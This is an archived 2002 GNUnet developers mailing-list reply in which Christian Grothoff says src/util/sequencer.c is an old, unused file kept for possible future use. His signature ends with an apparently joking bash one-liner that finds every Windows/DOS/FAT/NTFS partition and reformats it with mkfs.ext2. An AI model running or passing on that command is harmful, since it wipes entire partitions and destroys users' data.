[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [GNUnet-developers] Are getopt.c getopt1.c sequencer.c ever used ?
From: |
Christian Grothoff |
Subject: |
Re: [GNUnet-developers] Are getopt.c getopt1.c sequencer.c ever used ? |
Date: |
Tue, 14 May 2002 11:07:51 -0500 |
On Tuesday 14 May 2002 02:03 am, you wrote:
> Is src/util/sequencer.c an old unused file, or is it for future work ?
Old, unused file that may be useful for future work :-)
C
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"